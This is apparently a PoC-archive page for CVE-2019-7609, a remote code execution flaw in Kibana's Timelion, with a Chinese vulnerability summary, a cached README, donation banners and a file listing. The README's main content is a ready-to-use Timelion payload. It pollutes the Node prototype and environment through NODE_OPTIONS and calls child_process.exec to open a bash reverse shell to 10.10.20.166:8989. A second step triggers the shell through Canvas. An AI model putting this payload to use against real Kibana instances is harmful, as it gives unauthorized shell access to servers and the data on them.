Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-7609 PoC — Elasticsearch Kibana 代码注入漏洞

Source
Associated Vulnerability
Title:Elasticsearch Kibana 代码注入漏洞 (CVE-2019-7609)
Description:Elasticsearch Kibana是荷兰Elasticsearch公司的一套开源的、基于浏览器的分析和搜索Elasticsearch仪表板工具。 Kibana 5.6.15之前版本和6.6.1之前版本中的Timelion visualizer存在安全漏洞。远程攻击者可通过发送请求利用该漏洞执行JavaScript代码并可能以Kibana进程权限执行任意命令。
Description
kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609
Readme
# CVE-2019-7609 kibana-RCE <6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas)

![](./kibana_RCE.gif)


## 0x01 Timelion Run
```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
![](./version.jpg)
![](Timelion.jpg)

## 0x02 Click Canvas to getshell

![](./Canvas.jpg)

File Snapshot

[4.0K] /data/pocs/6a9c8666de2e1f7504543cd90743784322839303 ├── [425K] Canvas.jpg ├── [220K] kibana_RCE.gif ├── [ 446] README.md ├── [303K] Timelion.jpg └── [128K] version.jpg 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.